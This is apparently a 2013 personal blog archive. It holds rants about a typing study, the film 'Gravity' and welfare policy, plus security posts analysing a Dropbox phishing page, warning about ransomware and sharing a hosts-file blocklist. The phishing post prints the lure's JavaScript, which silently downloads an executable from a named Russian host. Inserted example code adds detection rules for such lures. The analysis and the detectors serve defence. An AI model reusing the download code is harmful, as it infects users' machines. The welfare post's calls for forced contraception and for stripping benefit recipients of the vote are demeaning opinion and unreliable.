Wednesday, October 30, 2013

Your junk non-science of the morning


ZOMG!!!  A study has revealed the vital finding that smartphones can’t automagically detect which key you meant to hit *if you don’t actually hit the fucking thing accurately!!*


Holy shit, and here I have been for years expecting to just mash my palm randomly on the keyboard and get the precise outcome I wanted, despite only making a random and non-specific indication of my intentions!

Anyone would think I was in management or something.



Gravity sucks.

Went to see Gravity last night.

One of the shorter movies I have seen (91 minutes apparently), and not a bad thing either, because it cut out at least half an hour's opportunity for the producers and director to make ONE OF THE MOST BORING FILMS I HAVE EVER SEEN.

I mean, far out... there was about 20 minutes of interesting stuff at the start, then 5 minutes in the middle and another 10 at the end.  The rest of it was Sandra and George doing relationship counselling rubbish while floating against a backdrop of stars, woo.

Seriously, give this one a miss.  Not impressed.  Go and see White House Down for a good flick.

Tuesday, October 22, 2013

Stand up, Australia - YOU CAN BE PROUD.

What else could you possibly want as a tourism tag line??



Monday, October 21, 2013

Put me in charge

Put me in charge of Australia's handout welfare system.  I’d get rid of cash payments for starters, and replace them with a debit card system that only allows you to buy certain items.  It would allow you to buy fresh meat, vegetables, milk, bread, salads etc.  Buying E91 or ethanol fuel would be OK, premium will not be.  And you won't own a car that needs it – trust me.  It would not allow you to buy frozen pizza, KFC, chips, chocolate, tobacco or alcohol.  If you want to buy those, then get a job and pay for them yourself.

 

Put me in charge of Medicare. The first thing I’d do is to get women Norplant birth control implants or tubal ligations.  I'd test recipients for drugs, alcohol, and nicotine - if you are found with these in your system, your payments are suspended.  I'd document all tattoos and piercings, if you are found with more than you had last time you've obviously got more of our cash than you need.  If you want to reproduce or use drugs, alcohol, smoke or get tattoos and piercings, then get a job and pay for it out of your own pocket.

 

Put me in charge of subsidised housing. Ever live in a military barracks?  You will maintain our property in a clean and good state of repair.  "Your" (read: our) house will be subject to inspections anytime, and possessions will be inventoried.  If you want a plasma TV or Xbox 360, then get a job and your own place on your own dollar.  Are you seeing a pattern yet?

 

Don't even think about letting drugs or alcohol be found in your subsidised housing.  If so, you're cut off for a year.  If found a second time, you're cut off for two years.  After that, I lose my normally cheerful disposition and it really starts to hurt.

 

You will either present a payslip from a job every time you want to collect a welfare handout or you will report to a government job. It may be cleaning the roads and parks of rubbish, painting and repairing public housing, but trust me - we'll find something.  I will also sell your 22 inch rims and low profile tyres and your car stereo system and put that money toward the welfare of someone who actually needs it.

 

Before you think that I’m violating your "rights", realize that all of the above is voluntary!  It's just that if you want our money, accept our rules.  Before you say that this is "demeaning" and lowers your "self esteem", consider that it wasn’t that long ago that taking someone else’s money for doing absolutely nothing was considered demeaning and lowered self esteem.

 

If we are expected to pay for other people’s mistakes we should at least attempt to make them learn from their bad choices. The current system rewards them for continuing to make bad choices and just perpetuates the cycle of welfare entitlement.

 

Oh yeah, one last thing - while receiving a handout you no longer can vote.  Voting is a privilege reserved for people who contribute to society and therefore earn a say in how it is structured, governed and run.  If you want to vote, then get a job.

Saturday, October 19, 2013

Saturday morning scammers and scumbags

Now here’s a subtle little scam.

Got an e-mail allegedly from Dropbox asking me to “update my password as I hadn’t logged in for a while.”  Remarkably for once I actually do use that service, but there’s a systray app that logs in automatically on boot, so red flag #1.

Unremarkably, the nice, friendly login button in the e-mail points to a compromised webserver, nothing special there.  What *was* interesting though was the peripheral approach taken to try to suck people in.  These pricks are really getting very subtle at this sort of thing.

Instead of the usual fake-landing-page-designed-to-look-real, I got a very realistic redirection delay.  Got to love the code snippet that does it:

window.onload = function() {
    // It's "cool" to let user wait 2 more seconds :/
}

You then get a nice, friendly page warning you of a security vulnerability with your PC - what helpful people!




Every single internet user in the world is constantly bombarded with security warnings, dire threats of armageddon to their data and PC, and is probably quite used to doing these sorts of updates as a knee-jerk reaction, right?

(The weakness here is that Chrome updates itself automatically, and who in their right mind would want to run IE on Linux??).  But then again this sort of scam isn't intended to catch people who know what they are doing anyway...

Of course, while the graphics themselves are simply hotlinked directly off http://updatebrowser.net, they point to a dodgy Russian webserver, and all of them to the same file http://dynamooblog.ru:8080/ieupdate[URL breaker].exe.

What's *really* fun is this little snippet of code hidden at the end of the page:

if(OSName=="Windows") {
    ifrm = document.createElement("IFRAME");
    ifrm.setAttribute("src", "http://dynamooblog.ru:8080/dropbox/check[\URL breaker].php");
    ifrm.style.width = 1+"px";
    ifrm.style.height = 1+"px";
    document.body.appendChild(ifrm);
    setTimeout(function() {
        document.getElementById('container').style.display = 'block';
        setTimeout(function() {
            window.location = 'http://dynamooblog.ru:8080/ieupdate[URL breaker].exe';
        },50000);
    }, 5000);
}


That little gem automatically initiates the download of the file to a Windows system anyway after 50 seconds... no interaction required from the user, only leaving the browser open long enough.  I only caught it because FDM caught the download initiation.

Now imagine what would have happened if the file auto-ran on completion of download...
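As an added example (not code from the lure page or from this post), here is a static check a defender could run over saved page source to flag the three traits described above: OS gating, a script-created 1px iframe, and a timed redirect to an executable. The sample is constructed, example.invalid stands in for the real host, and the rule names are this example's own.

```javascript
// Constructed sample modelled on the snippet above; example.invalid is a placeholder host.
const SAMPLE = `
if (OSName == "Windows") {
  ifrm = document.createElement("IFRAME");
  ifrm.setAttribute("src", "http://example.invalid:8080/check.php");
  ifrm.style.width = 1+"px";
  ifrm.style.height = 1+"px";
  document.body.appendChild(ifrm);
  setTimeout(function() {
    setTimeout(function() {
      window.location = 'http://example.invalid:8080/ieupdate.exe';
    }, 50000);
  }, 5000);
}`;

// Each rule is one trait of the lure; none is conclusive on its own.
const RULES = [
  { id: "os-gating", re: /\b(?:OSName|navigator\.(?:platform|userAgent))\b[^;{]*["']Win/i },
  { id: "script-created-iframe", re: /createElement\(\s*["']iframe["']\s*\)/i },
  { id: "tiny-iframe", re: /\.style\.(?:width|height)\s*=\s*["']?[01]\s*(?:\+\s*)?["']?px/i },
  { id: "navigate-to-executable",
    re: /location(?:\.href)?\s*=\s*["'][^"']+\.(?:exe|scr|msi|bat|cmd|pif)["']/i },
];

function triage(source) {
  const hits = RULES.filter((r) => r.re.test(source)).map((r) => r.id);
  // Numeric delays passed as the last argument of a callback-style timer call.
  const delaysMs = [...source.matchAll(/\}\s*,\s*(\d+)\s*\)/g)].map((m) => Number(m[1]));
  return {
    hits,
    delaysMs,
    hiddenFrame: hits.includes("script-created-iframe") && hits.includes("tiny-iframe"),
    timedDownload: hits.includes("navigate-to-executable") && delaysMs.length > 0,
  };
}

console.log(triage(SAMPLE));
```

Pattern matching like this only sees script that arrives in the clear, so treat a clean result on obfuscated source as "unknown" rather than "safe".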

Tuesday, October 15, 2013

New ransomware

Hi guys,

Something to be aware of - a new ransomware tool is doing the rounds that encrypts not only your local disks... but also any network destinations the PC has write access to.  Very, very nasty.  My NAS is read-only via HTTP/browse for this very reason; it's only writeable via FTP.

No version of Windows is immune, UAC won't stop it, and AV won't detect it currently.  You don't want this.  Apparently the most common method of delivery is as [filename].pdf.exe, and in moron-mode Windows hides the .exe extension as "known".  Watch what you click.

http://www.reddit.com/r/sysadmin/comments/1mizfx/proper_care_feeding_of_your_cryptolocker/
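An added example (not from the post or the linked thread): a filename check for the [filename].pdf.exe trick, of the kind a mail gateway or download-log review could apply. The extension lists, the attachment names and the function names are this example's assumptions.

```javascript
// Final extensions Windows executes, and document-like extensions used as the decoy.
const RUNNABLE = new Set(["exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js"]);
const DECOY = new Set(["pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt"]);

// Assumption: Explorer has "Hide extensions for known file types" on, so the
// final extension of a registered type is not shown to the user.
function shownInExplorer(name) {
  const n = name.trim();
  const dot = n.lastIndexOf(".");
  return dot > 0 ? n.slice(0, dot).trimEnd() : n;
}

function classify(name) {
  // Trim each part so space padding ("a.pdf      .exe") cannot hide the real type.
  const parts = name.toLowerCase().split(".").map((p) => p.trim());
  const last = parts[parts.length - 1];
  if (parts.length < 2 || !RUNNABLE.has(last)) return "ok";
  const decoy = parts.length >= 3 && DECOY.has(parts[parts.length - 2]);
  return decoy ? "masquerade" : "executable";
}

// Constructed attachment names, as a mail gateway or download log might list them.
const ATTACHMENTS = [
  "report.pdf",
  "invoice.pdf.exe",
  "Scan_001.PDF      .exe",
  "setup.exe",
  "notes.v2.txt",
];

function review(names) {
  return names
    .map((name) => ({ name, verdict: classify(name), shown: shownInExplorer(name) }))
    .filter((r) => r.verdict !== "ok");
}

console.log(review(ATTACHMENTS));
```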

No surprise, Tynt have friends

Following on from when I discovered Tynt and their spammy little ways last year, it probably shouldn't have come as a surprise to discover that other companies have decided to have a swim in the same pond of slime.

The Australian is apparently now using an effectively identical service called CopyNShare, which appends a forced (and no doubt trackable) URL to the end of anything you copy off their site, so copying this:

FORMER communications minister Stephen Conroy was the "root cause" of Labor's "abysmal" handling of the National Broadband Network, according to construction industry heavyweight David Chandler.

Ends up as:

FORMER communications minister Stephen Conroy was the "root cause" of Labor's "abysmal" handling of the National Broadband Network, according to construction industry heavyweight David Chandler. - See more at: http://www.theaustralian.com.au/business/in-depth/conroy-root-cause-of-nbn-woes/story-e6frgaif-1226739889457#sthash.5da9bT4Q.dpuf


Why does this irritate me?  Apart from my normal objection to every marketer in the world salivating at yet another opportunity to shove advertising in my face, the appended URL makes it a little more work when using the copy-search trick to bypass the laughably insecure News Ltd paywall.

During some searching for the CopyNShare servers so I could blackhole them, I came across this incredibly useful service.  Basically, they regularly publish a hosts file that you can use to blackhole traffic from a huge range of adware infestations, and just to add to the value, they also block all the spyware and malware C&C servers that they know of.  Absolutely brilliant.


Here's a sample from the start of my current hosts file to give you the idea:

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
# 127.0.0.1       localhost
# ::1             localhost

127.0.0.1  localhost

::1  localhost #[IPv6]

# [Start of entries generated by MVPS HOSTS]
#
# [Misc A - Z]
127.0.0.1  fr.a2dfp.net
127.0.0.1  m.fr.a2dfp.net
127.0.0.1  ad.a8.net
127.0.0.1  asy.a8ww.net
127.0.0.1  abcstats.com
127.0.0.1  a.abv.bg
127.0.0.1  adserver.abv.bg
127.0.0.1  adv.abv.bg
# [end of entries generated by MVPS HOSTS]
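An added example, not part of the MVPS file or this post: a parser for the hosts format shown above that lists which names are blackholed and separately reports any name mapped to a non-loopback address, which is worth auditing in any hosts file you did not write yourself. The example.invalid names and the 203.0.113.7 address are constructed, and the sink-address set is this example's assumption.

```javascript
// Constructed sample: two entries copied from the excerpt above plus made-up ones.
const SAMPLE_HOSTS = `
# [Start of entries generated by MVPS HOSTS]
127.0.0.1  localhost
::1  localhost #[IPv6]
127.0.0.1  fr.a2dfp.net
127.0.0.1  ad.a8.net   # inline comment
0.0.0.0    tracker.example.invalid ads.example.invalid
203.0.113.7  login.example.invalid
`;

// Addresses that send traffic nowhere useful (assumed sink set for this example).
const SINK = new Set(["127.0.0.1", "0.0.0.0", "::1", "::"]);
const LOCAL_NAMES = new Set(["localhost", "localhost.localdomain"]);

function parseHosts(text) {
  const blocked = new Set();
  const redirected = new Map(); // hostname -> non-sink address it is pinned to
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.split("#")[0].trim(); // drop full-line and inline comments
    if (!line) continue;
    const [addr, ...names] = line.split(/\s+/); // one address, one or more names
    for (const name of names.map((n) => n.toLowerCase())) {
      if (LOCAL_NAMES.has(name)) continue;
      if (SINK.has(addr)) blocked.add(name);
      else redirected.set(name, addr);
    }
  }
  return { blocked, redirected };
}

// Hosts entries match exact names only, so a subdomain of a blocked name is not blocked.
function isBlocked(parsed, hostname) {
  return parsed.blocked.has(hostname.toLowerCase().replace(/\.$/, ""));
}

const parsed = parseHosts(SAMPLE_HOSTS);
console.log([...parsed.blocked], [...parsed.redirected]);
```

Because matching is exact, a blocklist entry for `ad.a8.net` does nothing for `x.ad.a8.net`; each name has to be listed.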